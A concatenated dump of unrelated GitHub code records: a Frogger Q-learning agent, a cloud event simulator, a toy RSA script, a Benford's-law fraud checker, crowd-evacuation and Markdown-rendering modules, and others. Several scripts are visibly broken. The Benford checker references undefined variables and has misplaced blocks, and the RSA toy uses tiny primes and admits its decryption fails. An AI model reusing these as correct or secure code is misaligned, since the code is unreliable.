ACTION_RIGHT and state_right == 2:\n return True\n if self.__action == ACTION_LEFT and state_left == 2:\n return True\n if self.__action == ACTION_DOWN and state_down == 2:\n return True\n\n return False\n else:\n self.__next_state = (state_up, state_down, state_right, state_left, state_stay, self.__frog.current_pos[1])\n return False\n\n def run_game(self, session):\n is_loose_game = False\n is_won_game = False\n step = 0\n self.__action = ACTION_STAY\n is_out_of_map = False\n new_q = None\n\n while step < MAX_STEPS:\n if is_out_of_map:\n self.__frog.have_jump = True\n\n self.move_cars()\n self.update_car_collision()\n\n if self.__frog.have_jump:\n step += 1\n\n is_out_of_map = self.update_state(False)\n\n if not is_out_of_map:\n self.__frog.move(self.__action)\n is_loose_game, is_won_game = self.check_collision()\n\n if is_loose_game or is_out_of_map:\n self.__reward = DEATH_REWARD\n elif is_won_game:\n self.__reward = WIN_REWARD\n else:\n if self.__action == ACTION_LEFT or self.__action == ACTION_RIGHT:\n self.__reward = STEP_TO_SIDE_REWARD\n elif self.__action == 1:\n self.__reward = STEP_FORWARD_REWARD\n elif self.__action == 4:\n self.__reward = STEP_TO_BACK_REWARD\n else:\n self.__reward = 
STAY_REWARD\n\n if is_loose_game:\n new_q = DEATH_REWARD\n elif is_won_game:\n new_q = WIN_REWARD\n else:\n is_out_of_map = self.update_state(True)\n\n self.__max_next_q = max(self.__q_table[self.__next_state])\n # new_q = self.__alpha * (\n # self.__reward + self.__gamma * self.__max_next_q - self.__q_table[self.__current_state][self.__action])\n\n new_q = self.__q_table[self.__current_state][self.__action - 1] + self.__alpha * (self.__reward + self.__max_next_q - self.__q_table[self.__current_state][self.__action - 1])\n self.__q_table[self.__current_state][self.__action - 1] = new_q\n\n if (self.__reward == WIN_REWARD or self.__reward == DEATH_REWARD or step == self.__max_steps) and self.__is_able_to_die:\n self.__frog.rect.x = 240\n self.__frog.rect.y = 540\n self.__frog.current_pos = (4, 9)\n self.__session_reward += self.__reward\n break\n else:\n self.__frog.move(self.__action)\n self.check_collision()\n\n self.__session_reward += self.__reward\n self.update_windows(session, self.__reward)\n print(f\"episode: {session}, cooling_rate: {self.__cooling_rate}, reward: {self.__session_reward}, exploration: {self.__exploration}\")\n self.__list_session_reward.append(self.__session_reward)\n self.__session_reward = 0\n self.__cooling_rate *= COOLING_RATE_DECAY\n\n def run_session(self, is_should_save= True):\n for session in range(self.__max_session):\n self.run_game(session)\n\n rewardsAverage = np.convolve(self.__list_session_reward, np.ones((PLT_TRONC,)) / PLT_TRONC, mode=\"valid\")\n plt.plot([i for i in range(len(rewardsAverage))], rewardsAverage)\n plt.ylabel(f\"reward {PLT_TRONC}ma\")\n plt.xlabel(\"Session #\")\n plt.show()\n\n if is_should_save:\n self.save()\n\n\nif __name__ == \"__main__\":\n env = Environment()\n","repo_name":"ThibaudBr/frogger_ia","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27754303844","text":"from __future__ import annotations\nfrom ..events import Event\nfrom ..utils import MinHeap\nfrom ..entity import SimulationEntity\nfrom enum import Enum\nimport threading\nimport numpy as np\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from ..datacenters import Datacenter\n from ..listeners import EventListener, CircularClockListener\n\n\nclass Simulator(SimulationEntity):\n class State(Enum):\n \"\"\"The simulation is initailized but not running yet\"\"\"\n INITIALIZED = 0\n \"\"\"The simulation is running\"\"\"\n RUNNING = 1\n \"\"\"The simulation is paused\"\"\"\n PAUSED = 2\n \"\"\"The simulation end normaly or the terminate time arrives\"\"\"\n\n def event_comparator(event_a: Event, event_b: Event) -> bool:\n # The event with small start delay goes first\n if event_a.get_start_time() < event_b.get_start_time():\n return True\n elif event_a.get_start_time() > event_b.get_start_time():\n return False\n else:\n # If 2 or more events occur at the same time,\n # event with higher priority (smaller priority value, see details in Event class)\n # go first\n if event_a.get_event_priority() < event_b.get_event_priority():\n return True\n elif event_a.get_event_priority() > event_b.get_event_priority():\n return False\n else:\n # If 2 events with the same priority occur at the same time,\n # their order doesn't matter\n return False\n\n def __init__(self) -> None:\n \"\"\"\n A simulator is the core of cloud simulation, \n which maintains an event priority queue and\n a global clock to perform event-driven 
simulation.\n The events in event queue are ordered by start time.\n Event with smallest start time comes to the top of heap.\n A simulator is also an event dispatcher, \n which accepts scheduled event from simulation entities \n and act properly when event occurs\n \"\"\"\n self.event_queue = MinHeap(Simulator.event_comparator)\n self.global_clock_prev = 0.0\n self.global_clock = 0.0\n self.event_listener_list = []\n self.circular_clock_listener_list = []\n self.state = Simulator.State.INITIALIZED\n self.datacenter = None\n self.is_terminate_time_set = False\n self.event_queue.push(Event(source=None, target=self, event_type=Event.TYPE.SIMULATION_TERMINATE, extra_data={\"simulator\": self}, start_time=np.finfo(np.float64).max))\n\n def get_global_clock(self) -> float:\n return self.global_clock\n\n def set_termination_time(self, terimination_time: float):\n self.is_terminate_time_set = True\n self.event_queue.push(Event(source=None, target=self, event_type=Event.TYPE.SIMULATION_TERMINATE, extra_data={\"simulator\": self}, start_time=terimination_time))\n\n def submit(self, event: Event) -> None:\n self.event_queue.push(event)\n\n def process(self, event: Event):\n for event_listener in self.event_listener_list:\n event_listener.update(event, self)\n if event.get_event_type() == Event.TYPE.SIMULATION_TERMINATE:\n self.process_simulation_terminate(event)\n elif event.get_event_type() == Event.TYPE.SIMULATION_PAUSE:\n self.process_simulation_pause(event)\n elif event.get_event_type() == Event.TYPE.CIRCULAR_CLOCK_EVENT:\n for circular_clock_listener in self.circular_clock_listener_list:\n circular_clock_listener.update(self)\n else:\n self.send(event)\n self.global_clock_prev = self.global_clock\n\n def process_simulation_terminate(self, event: Event):\n if not self.is_terminate_time_set:\n self.global_clock = self.global_clock_prev\n self.datacenter.process_simulation_terminate(event)\n\n def process_simulation_pause(self, event: Event):\n self.state = Simulator.State.PAUSED\n\n def send(self, event: Event) -> None:\n event.get_target().process(event)\n\n def run_util_pause_or_terminate(self) -> None:\n self.state = Simulator.State.RUNNING\n while self.state == Simulator.State.RUNNING and not self.event_queue.is_empty():\n event = self.event_queue.pop()\n self.global_clock = event.get_start_time()\n self.process(event)\n\n def add_event_listener(self, listener: EventListener):\n self.event_listener_list.append(listener)\n\n def add_circular_clock_listener(self, listener: CircularClockListener):\n self.circular_clock_listener_list.append(listener)\n self.event_queue.push(Event(\n source=None, target=self, event_type=Event.TYPE.CIRCULAR_CLOCK_EVENT, extra_data=None, start_time=0.0))\n\n def get_state(self) -> State:\n return self.state\n\n def set_state(self, state: State):\n self.state = state\n\n def set_datacenter(self, datacenter: Datacenter):\n self.datacenter = datacenter\n \n def get_datacenter(self)->Datacenter:\n return self.datacenter\n","repo_name":"AndrewLawrence80/pycloudsim","sub_path":"pycloudsim/simulation/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5411680323","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# TODO:\r\n#two big primes\r\n#n , phi(n)\r\n#e - random til acceptable\r\n#d = e^-1\r\n# convert text into intstring -> then int -> send into RSA system.\r\n\r\nimport math\r\nfrom random import randint\r\n\r\ndef 
main():\r\n blocksize = 2 # the larger the primes -> the larger the blocksize can be --> also the longer the calculations take.\r\n indata = \"hallåellerärduheltgoknödighej\"\r\n text = check_input_length(indata, blocksize)\r\n print(\"indata, plaintext:\", text)\r\n text_in_ints = text_convert(text, blocksize)\r\n print(text_in_ints)\r\n public_key, private_key = RSA(1021,1087)#ex\r\n cipher = encrypt(text_in_ints, public_key[0], public_key[1]) #ciphers are integers -> cannot control conversion to be z_28\r\n print(\"cipher:\", cipher)\r\n plaintext_in_ints = decrypt(cipher, private_key[0], private_key[1]) # doesnt work with blocksize larger than 1, text_in_ints =/= plaintext_in_ints\r\n print(plaintext_in_ints)\r\n plaintext = text_convert(plaintext_in_ints, blocksize, \"text\")\r\n print(\"Deciphered text:\", plaintext)\r\n\r\ndef text_convert(text, blocksize, type = \"int\"):\r\n if type == \"text\":\r\n alphabet = S_A()\r\n plaintext = \"\"\r\n if blocksize == 1:\r\n for value in text:\r\n plaintext += alphabet[value]\r\n else:\r\n for i in range(0, len(text)):\r\n count = 0\r\n blockstring = \"\"\r\n while count < blocksize:\r\n blockstring += str(text[i]).zfill(blocksize*2)\r\n count += 1\r\n count = 0\r\n # print(blockstring)\r\n while count < blocksize:\r\n plaintext += alphabet[int(blockstring[count*2:count*2+2])]\r\n count += 1\r\n return plaintext\r\n text_int = []\r\n count = 0\r\n while count < len(text):\r\n m = \"\" # blockstring first\r\n i = count\r\n while i < count+blocksize: #add m's number into a blockstring\r\n m += str(number_in_S_A(text[i])).zfill(2)\r\n i += 1\r\n m = int(m) #m -> integer\r\n text_int.append(m)\r\n count += blocksize\r\n return text_int\r\n\r\ndef check_input_length(text, blocksize):\r\n while len(text) % blocksize != 0:\r\n text += \"x\" #add filler\r\n return text\r\n\r\ndef number_in_S_A(letter_in):\r\n letter_in = letter_in.lower()\r\n alphabet = S_A()\r\n for index, letter in enumerate(alphabet):\r\n if letter == letter_in:\r\n return index\r\n return 22 # if it doesn't exist in {swedishalphabet}\\{w} -> x\r\n\r\ndef S_A():\r\n return \"abcdefghijklmnopqrstuvxyzåäö\"\r\n\r\ndef RSA(p, q): #only primes\r\n n = p*q\r\n phi = (p-1)*(q-1) #phi of n -> p and q are primes -> phi(n)=phi(p*q)=phi(p)*phi(q) = (p-1)*(q-1)\r\n e = 0\r\n d = 0\r\n while math.gcd(e,phi) != 1:\r\n e = randint(3,phi)\r\n d = pow(e, -1, phi)\r\n public_key = [n, e] # security is based on the fact that factorization of n takes a hella long time for large primes.\r\n private_key = [n, d]\r\n return public_key, private_key\r\n\r\ndef encrypt(text_in_ints, n, e):\r\n cipher = []\r\n for value in text_in_ints:\r\n cipher.append(pow(value, e, n)) #calculating...\r\n return cipher\r\n\r\ndef decrypt(cipher_in_ints, n, d):\r\n plaintext= []\r\n for value in cipher_in_ints:\r\n plaintext.append(pow(value, d, n)) #calculating...\r\n return plaintext\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Itggot-lukas-einlerlarsson/crypto","sub_path":"RSA_python.py","file_name":"RSA_python.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30751786983","text":"import os\nprint(os.getcwd())\ndef printMenu():\n print('''\n Customer and Sales System\\n \n 1. Load sales data\\n\n 2. 
Create Chart\\n\n Enter menu option (1-2) \n ''') # Gives the user two options one to load the sale data and two to create the chart \n \n# Variables \n\nuserInput = \"\"\nsaledata = \"1\"\ncreatechart = \"2\"\n\n\nif userInput == saledata: \n folder = os.getcwd()\n fileName = folder + \"\\\\sales.csv\" # Prints the csv file\n file = open(fileName, \"r\")\n print(file.read())\n file.close()\n \n salesData = [] #Creates empty list for sales data\nwith open(\"sales.csv\" , 'r') as file: #Opens csv file in read mode under the variable file \n lines = file.readlines()[1:] # read lines and store under lines variable. '[1: ]' skips first row\nfor line in lines: \n salesData.append(int(line.strip().split(',')[1])) #splits the second column, turns number in to integers, and stores under 'salesData' list \n\ndigit_counts = [0] * 9 #Generates 9 number list all starting at 0\nfor num in sales_data:\n first_digit = int(str(num)[0]) #Convert first digit of every number into integer using '(str(num0[0])'\ndigit_counts[first_digit-1] += 1\n\ndigit_percentages = [] #Empty list for percentages of digit occurences \nfor count in digit_counts:\n percentage = count/len(sales_data)*100 #divide count by total sales and mulitiply by 100\ndigit_percentages.append(percentage)\n\nfraud_threshold = (29, 32) #Sets range where fraud does not occur using tuple containing min and max integer \nif fraud_threshold[0] <= digit_percentages[0] <= fraud_threshold[1]:\n print(\"The data indicates that fraud likely did not occur.\")\nelse:\n print(\"The data indicates that fraud may have occurred.\") \n\n\n# chart\n\n if userInput == createchart: \n\n import matplotlib as plt\n\n plt.xlabel(\"Number\")\n plt.ylabel(\"Percent\")\n plt.show()\n\n folder = os.getcwd()\n fileName = folder + \"\\\\results.csv\" #Creates a new csv file when inputed \n file = open(fileName, \"w\")\n print(file.read())\n file.close()\n\n else:\n print(\"Please type in a valid option (A number from 1-2)\")\n\n\n\n\n\n","repo_name":"Nathantambourine/-Jeyabravin-Ethan-Thambirajah-Nathan-Benford-s-Law-Assignment","sub_path":"Benford's Law.py","file_name":"Benford's Law.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15214634809","text":"import pprint\n\n# 'PATH_INFO': '/hello',\n# 'QUERY_STRING': 'a=12&b=1&b=2',\n\ndef app(environ, start_response):\n pprint.pprint(environ)\n vars = environ['QUERY_STRING'].split(\"&\")\n data = '\\n'.join(vars) + '\\n'\n data = data.encode('utf-8')\n # data = b\"Hello, World!\\n\"\n start_response(\"200 OK\", [\n (\"Content-Type\", \"text/plain\"),\n# (\"Content-Length\", str(len(data)))\n ])\n\n return iter([data])\n","repo_name":"f4rx/StepicPythonWeb","sub_path":"1.9.11_gunicorn_app/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"75060493447","text":"\"\"\"Module containing the Simulation class.\"\"\"\n\nimport csv\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport networkx as nx\nfrom copy import deepcopy\n\nfrom .network import NetworkModel\n\n\nclass Simulation:\n \"\"\"\n Class for creating a network model simulation.\n\n Attributes\n ----------\n network_model(NetworkModel): The underlying model.\n T(int): The time since the start of the evacuation.\n evacuated(float): The number of people already evacuated.\n start(NetworkModel): The initial state of the model.\n 
simulation_results(list): The state of the model at different timesteps.\n evacuated_results(list): The number of people evacuated at different\n timesteps.\n \"\"\"\n\n def __init__(self,\n filepaths,\n limiting_flow_walkway=3.3,\n limiting_flow_rate_doorway=0.7,\n free_speed_walkway=1.25):\n \"\"\"\n Create an instance of the Simulation class.\n\n Parameters\n ----------\n filepaths(list): The list of filepaths for edge/node files.\n limiting_flow_walkway(float): The limiting flow in walkways.\n limiting_flow_rate_doorway(float): The limiting flow rate through\n doorways.\n free_speed_walkway(float): The free speed in walkways.\n \"\"\"\n self.network_model = NetworkModel()\n self.T = 0\n self.evacuated = 0\n for filepath in filepaths:\n self.network_model.add_graph_from_csv(filepath,\n limiting_flow_walkway,\n limiting_flow_rate_doorway,\n free_speed_walkway)\n\n def set_initial_populations(self, filepath):\n \"\"\"\n Set the initial populations of the network.\n\n Parameters\n ----------\n filepath(str): The filepath of the populations file.\n \"\"\"\n self.evacuated = 0\n with open(filepath) as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if len(row) == 2:\n num, pop = row\n self.network_model.nodes[num][\"population\"] = float(pop)\n\n def _increment_time(self):\n self.T += 1\n to_go = [\"8\"]\n while to_go:\n next = to_go.pop()\n in_edges = self.network_model.in_edges(next)\n out_edges = self.network_model.out_edges(next)\n if out_edges:\n to_dist = (min(self.network_model.nodes[next][\"population\"],\n self.network_model.nodes[next][\"flow_rate\"])\n / len(out_edges))\n for edge in out_edges:\n self.network_model.edges[edge][\"populations\"][0] += to_dist\n self.network_model.nodes[next][\"population\"] -= to_dist\n\n else:\n moving = min(self.network_model.nodes[next][\"population\"],\n self.network_model.nodes[next][\"flow_rate\"])\n self.evacuated += moving\n self.network_model.nodes[next][\"population\"] -= moving\n\n for edge in in_edges:\n if self.network_model.edges[edge][\"populations\"][-1] > 0:\n self.network_model.nodes[next][\"population\"] += \\\n self.network_model.edges[edge][\"populations\"][-1]\n self.network_model.edges[edge][\"populations\"][-1] = 0\n pop_len = len(self.network_model.edges[edge][\"populations\"])\n for i in range(pop_len - 1, 1, -1):\n self.network_model.edges[edge][\"populations\"][i] += \\\n self.network_model.edges[edge][\"populations\"][i - 1]\n self.network_model.edges[edge][\"populations\"][i - 1] = 0\n if self.network_model.edges[edge][\"populations\"][0] > 0:\n flow_rate = self.network_model.edges[edge][\"flow_rate\"]\n pop = self.network_model.edges[edge][\"populations\"][0]\n moving = min(flow_rate,\n pop)\n self.network_model.edges[edge][\"populations\"][1] += moving\n self.network_model.edges[edge][\"populations\"][0] -= moving\n to_go.append(edge[0])\n\n def _update(self, num, fixed_pos):\n self.ax.clear()\n graph = self.simulation_results[num]\n nodes = graph.nodes()\n edges = graph.edges()\n colors_nodes = [((graph.nodes[n]['population']\n / self._get_total_population())\n if n != \"8\"\n else ((graph.nodes[n][\"population\"]\n + self.evacuated_results[num])\n / self._get_total_population())\n for n in nodes)]\n colors_edges = [((sum(graph.edges[e][\"populations\"])\n / self._get_total_population())\n for e in edges)]\n pos = nx.spring_layout(graph, fixed=fixed_pos.keys(), pos=fixed_pos)\n nx.draw_networkx_edges(graph,\n pos,\n edgelist=edges,\n edge_color=colors_edges,\n width=3,\n edge_cmap=plt.cm.jet,\n 
edge_vmin=0,\n edge_vmax=1)\n nx.draw_networkx_nodes(graph,\n pos,\n nodelist=nodes,\n node_color=colors_nodes,\n node_size=100,\n cmap=plt.cm.jet,\n vmin=0,\n vmax=1)\n\n def _get_total_population(self):\n pop = (self.evacuated\n + sum([(self.network_model.nodes[node][\"population\"]\n for node in self.network_model.nodes())])\n + sum([(sum(self.network_model.edges[edge][\"populations\"])\n for edge in self.network_model.edges())]))\n return pop\n\n def animation(self, pos, filepath=None, show=False):\n \"\"\"\n Animate the evacuation simulation.\n\n Parameters\n ----------\n pos(dict): The list of positions of nodes.\n filepath(str): The filepath to save the animation in.\n show(bool): Whether to display the animation or not.\n \"\"\"\n self.simulate()\n print(\"Simulation DONE\")\n self.fig, self.ax = plt.subplots(figsize=(20, 15))\n frame_count = len(self.simulation_results)\n ani = matplotlib.animation.FuncAnimation(self.fig,\n lambda num: self._update(num,\n pos),\n frames=frame_count,\n interval=600,\n repeat=False)\n print(\"Animation DONE\")\n if filepath:\n ffmpeg_writer = matplotlib.animation.writers['ffmpeg']\n writer = ffmpeg_writer(fps=10,\n metadata=dict(artist=\"Harrison Mouat\"),\n bitrate=1800)\n ani.save(filepath, writer=writer)\n print(\"SAVED\")\n if show:\n plt.show()\n\n def simulate(self):\n \"\"\"Simulate the evacuation.\"\"\"\n self.start = self.network_model\n self.simulation_results = [deepcopy(self.network_model)]\n self.evacuated_results = [self.evacuated]\n while self.evacuated < self._get_total_population():\n self._increment_time()\n self.simulation_results.append(deepcopy(self.network_model))\n self.evacuated_results.append(self.evacuated)\n self.network_model = self.start\n print(f\"Time to evacuate: {self.T}\")\n print(f\"Total population: {self._get_total_population()}\")\n self.T = 0\n","repo_name":"Harry-icl/science-of-crowds","sub_path":"network_simulation/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":8130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28393033492","text":"import logging\nimport mistune\nimport urwid\n\nfrom hubtty import mywid\n\nclass Renderer:\n def __init__(self, app):\n self.log = logging.getLogger('hubtty.markdown')\n self.app = app\n\n def toUrwidMarkup(self, ast):\n text = []\n for element in ast:\n if element['type'] == 'text':\n text.append(element['text'])\n elif element['type'] == 'strong':\n text.append(('md-strong', self.toUrwidMarkup(element['children'])))\n elif element['type'] == 'emphasis':\n text.append(('md-emphasis', self.toUrwidMarkup(element['children'])))\n elif element['type'] == 'strikethrough':\n text.append(('md-strikethrough', self.toUrwidMarkup(element['children'])))\n elif element['type'] == 'heading':\n text.append(('md-heading', [\"#\" * element['level'], \" \", self.toUrwidMarkup(element['children']), \"\\n\"]))\n elif element['type'] == 'paragraph':\n # Add newline before paragraphs if needed\n if self.needsNewLine(text):\n text.append(\"\\n\")\n text.extend(self.toUrwidMarkup(element['children']))\n text.append(\"\\n\")\n elif element['type'] == 'newline':\n text.append(\"\\n\")\n elif element['type'] == 'thematic_break':\n text.append(('md-thematicbreak', \"\\n———————————————\\n\\n\"))\n elif element['type'] == 'block_quote':\n text.append(('md-blockquote', [\"| \", self.toUrwidMarkup(element['children'])]))\n elif element['type'] == 'block_code':\n info = element['info']\n if info == None:\n info = 
\"\"\n text.append(('md-blockcode', [\"```%s\\n\" % info, element['text'], \"```\\n\"]))\n elif element['type'] == 'image':\n # image - do nothing\n pass\n elif element['type'] == 'block_html':\n # HTML comments - do nothing\n pass\n elif element['type'] == 'codespan':\n text.append(('md-codespan', element['text']))\n elif element['type'] == 'list':\n if element['ordered']:\n idx = 1\n for li in element['children']:\n text.append(\" \" * element['level'] + \"%s. \" % idx)\n text.extend(self.toUrwidMarkup([li]))\n idx += 1\n else:\n for li in element['children']:\n text.append(\" \" * element['level'] + \"- \")\n text.extend(self.toUrwidMarkup([li]))\n elif element['type'] == 'list_item':\n text.extend(self.toUrwidMarkup(element['children']))\n elif element['type'] == 'block_text':\n text.extend(self.toUrwidMarkup(element['children']))\n text.append(\"\\n\")\n elif element['type'] == 'link':\n url = element['link']\n link_text = \"\"\n for child in element['children']:\n if child.get('text'):\n link_text += child['text']\n elif child.get('alt'):\n link_text += child['alt']\n link = mywid.Link(link_text, 'link', 'focused-link')\n urwid.connect_signal(link, 'selected',\n lambda link:self.app.openURL(url))\n text.append(link)\n else:\n self.log.warning(\"unknown element type: %s\" % element['type'])\n if 'children' in element:\n text.extend(self.toUrwidMarkup(element['children']))\n return text\n\n def needsNewLine(self, text):\n if len(text) == 0 or text == [\"\\n\"]:\n return False\n\n last_element = text[-1]\n second_to_last_element = \"\"\n if len(text) > 1:\n second_to_last_element = text[-2]\n\n while not isinstance(last_element, str):\n while isinstance(last_element, list):\n if len(last_element) > 1:\n second_to_last_element = last_element[-2]\n if len(last_element) > 0:\n last_element = last_element[-1]\n else:\n # Should not get empty list\n return False\n while isinstance(last_element, tuple):\n last_element = last_element[-1]\n # Just to make sure we don't enter an infinite loop\n if not (isinstance(last_element, list) or isinstance(last_element, str)):\n return False\n\n if last_element.endswith(\"\\n\\n\"):\n return False\n\n if last_element == \"\\n\":\n # Need to look in second to last element\n while not isinstance(second_to_last_element, str):\n while isinstance(second_to_last_element, list):\n if len(second_to_last_element) > 0:\n second_to_last_element = second_to_last_element[-1]\n else:\n # Should not get empty list\n return False\n while isinstance(second_to_last_element, tuple):\n second_to_last_element = second_to_last_element[-1]\n # Just to make sure we don't enter an infinite loop\n if not (isinstance(second_to_last_element, list) or isinstance(second_to_last_element, str)):\n return False\n\n if second_to_last_element.endswith(\"\\n\"):\n return False\n\n return True\n \n\n def render(self, text):\n md = mistune.create_markdown(renderer=mistune.AstRenderer(), plugins=['strikethrough'])\n # Misture returns newline for empty text, we don't want that\n if not text:\n return []\n ast = md(text)\n return self.toUrwidMarkup(ast)\n","repo_name":"hubtty/hubtty","sub_path":"hubtty/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"9318410268","text":"from key_binary_tree import KeyBinaryTree\n\ndef key_binary_tree_sort(list_, key=lambda x: x, reverse=False):\n\n class Tree(KeyBinaryTree):\n def to_list(self):\n list_ = []\n def 
handle(tree):\n list_.append(tree.root.key)\n self.inorder_traversal(self, handle)\n return list_\n\n list_ = list(map(lambda item: (key(item), item), list_))\n tree = Tree()\n for key, item in list_:\n tree.add(key, item)\n list_ = tree.to_list()\n return list_\n \n\n","repo_name":"sally-langshuang/algorithm","sub_path":"key_binary_tree_sort.py","file_name":"key_binary_tree_sort.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34377936383","text":"import sys\nsys.path.append('..')\nfrom test_framework.test_result import TestResult\nfrom test_framework.single_test import SingleTest\nfrom test_framework.compare import TestCompare\nfrom helpers.unit_converters.eps_telemetry_converter import *\nfrom helpers.unit_converters.convert_dict import *\nfrom helpers.unit_converters.eps_to_dict import * \n\n\nclass TestEPSA(SingleTest):\n def set_default_title_description(self):\n self.default_name = \"Test EPS A HK\"\n self.default_description = \"Basic EPS A housekeeping check\"\n\n def test_script(self):\n response_data = ControllerA.to_dict(self.obc.read_housekeeping_a())\n self.log.debug(\"OBC response: {}\".format(response_data))\n self.data = ConvertDict.convert(response_data, eps_a_telemetry_conversion)\n self.result = TestCompare.assert_within_closed_interval_dict_converted(self.data, self.kwargs['ranges'])\n\n\nclass TestEPSB(SingleTest):\n def set_default_title_description(self):\n self.default_name = \"Test EPS B HK\"\n self.default_description = \"Basic EPS B housekeeping check\"\n\n def test_script(self):\n response_data = ControllerB.to_dict(self.obc.read_housekeeping_b())\n self.log.debug(\"OBC response: {}\".format(response_data))\n self.data = ConvertDict.convert(response_data, eps_b_telemetry_conversion)\n self.result = TestCompare.assert_within_closed_interval_dict_converted(self.data, self.kwargs['ranges'])\n\n\n\n'''\nclass TestPV(SingleTest):\n def set_default_title_description(self):\n self.default_name = \"Test Photovoltaics\"\n self.default_description = \"Test Photovoltaic Modules, Photodiodes and Thermometers\"\n\n def test_script(self):\n response_data = ControllerA.to_dict(self.obc.read_housekeeping_a())\n self.log.debug(\"OBC response: {}\".format(response_data))\n self.data = ResultData(\"OK\", \"OK\", None)\n self.result = \n'''","repo_name":"PW-Sat2/PW-Sat2-EGSE","sub_path":"health_check_software/tests/test_eps.py","file_name":"test_eps.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"22870444656","text":"from importlib.machinery import SourceFileLoader\nfrom inspect import signature, isfunction\n\nclass Hook:\n\n # Common class for all the hooks that are going to be in the system\n # Initializing Hook object with the require parameters\n def __init__(self, name, description, path):\n self.name = name\n self.description = description\n self.path = path\n self.status = False\n self.loader = SourceFileLoader(\"ntps_hooks_(%s)\" % name, path)\n self.module = self.loader.load_module()\n self.inCollection = False\n self.execNum = 0\n self.validHook = False\n self.association = 0\n self.index = -1\n\n # This method has been tested\n # This method is in charge of deleting the Hook object from the system\n def removeHook(self):\n print(\"%s deleted from system\" % self.name)\n del self\n\n # This method would enabled the hook to be executed\n # Possible solution 
running hooks on their own threads\n # Need to fix\n def activateHook(self, pkt):\n if self.validHook is True and self.inCollection is True:\n print(\"Hook %s is enabled\" % self.name)\n self.status = True\n #tryHook = self.module.hook\n #self.runHook(tryHook)\n elif self.inCollection is True and self.validHook is False:\n print(\"Hook %s is not a valid Hook\" % self.name)\n else:\n print(\"Hook %s does not belong to a collection and can't be enabled!\" % self.name)\n\n def disableHook(self):\n print(\"%s is disabled\" % self.name)\n self.status = False\n\n def runHook(self, hookMethod, pkt):\n print(\"%s is running\" % self.name)\n if self.status is True:\n print(hookMethod(pkt))\n\n def checkHookProtocol(self):\n try:\n if isfunction(self.module.hook):\n sign = signature(self.module.hook)\n print(sign.parameters) # Debugging tool\n self.validHook = True\n return True\n\n except Exception:\n print(\"Error!\") # Hook Error Overlay here\n print(\"This hook does not follow protocol\\n\")\n\n self.removeHook()\n return False\n\n # This method has been tested\n # This method is a debugger tool to print the Hooks\n def printHook(self):\n print(\"The hook name is: \", self.name)\n print(\"Hook Description is: \", self.description)\n print(\"Hook Path: \", self.path)\n print(\"Status: \", self.status)\n print(\"In collection: \", self.inCollection)\n print(\"Execution Number: \", self.execNum)\n\n def RunFunctionalHooks(self, pkt):\n if self.status:\n hookmdl = self.module.hook\n self.runHook(hookmdl, pkt)\n","repo_name":"SETeamDante/ntps","sub_path":"HookSub/Hook.py","file_name":"Hook.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12399791723","text":"import webapp2\nfrom models import Variable\n\nclass GetHandler(webapp2.RequestHandler):\n def get(self):\n name = self.request.get('name')\n\n query = Variable.query(Variable.name == name)\n variable = query.get(projection=[Variable.value])\n\n self.response.headers['Content-Type'] = 'text/plain'\n if variable is None:\n self.response.write('None')\n else:\n self.response.write(variable.value)\n","repo_name":"slavik57/historical-dictionary","sub_path":"handlers/GetHandler.py","file_name":"GetHandler.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10014262157","text":"# coding=utf-8\nfrom django import template\nfrom django.utils import translation\n\nregister = template.Library()\n\n\ndef burmese_numerals(parser, token):\n nodelist = parser.parse(('end_burmese_numerals',))\n parser.delete_first_token()\n return UpperNode(nodelist)\n\n\nclass UpperNode(template.Node):\n def __init__(self, nodelist):\n self.nodelist = nodelist\n\n def render(self, context):\n output = self.nodelist.render(context)\n if translation.get_language() == \"my\":\n return convert_num_to_mm(output)\n else:\n return output\n\n\n@register.filter\ndef num_to_mm(value): # convert english numerals into myanmar numerals\n if translation.get_language() == \"my\":\n return convert_num_to_mm(value)\n else:\n return value\n\n\ndef convert_num_to_mm(value):\n if value:\n intab = u\"0123456789\"\n outtab = u\"၀၁၂၃၄၅၆၇၈၉\"\n intab = [ord(char) for char in intab]\n translate_table = dict(zip(intab, outtab))\n return unicode(value).translate(translate_table)\n else:\n return value\n\n\nregister.tag('burmese_numerals', 
